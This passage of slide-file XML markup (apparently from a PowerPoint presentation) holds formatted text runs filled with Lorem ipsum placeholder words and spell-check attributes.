              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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viverra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultricies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> diam. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sodales</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,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aliquam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Proin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>commodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> nisi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Praesent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec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 non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mollis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>placerat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vivamus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pulvinar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>augue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>volutpat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>risus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Curabitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bibendum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>faucibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>posuere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ex. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auctor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>maximus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sapien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>interdum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Curabitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pulvinar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>erat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>massa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lacinia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>laoreet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>massa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Phasellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lobortis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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tellus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mollis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iaculis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Nam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auctor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>arcu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>molestie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhoncus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>velit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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pulvinar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ac, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultrices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dui. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Praesent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>commodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>odio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ullamcorper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eleifend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, magna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod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, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>porttitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Donec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>egestas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nulla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sollicitudin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
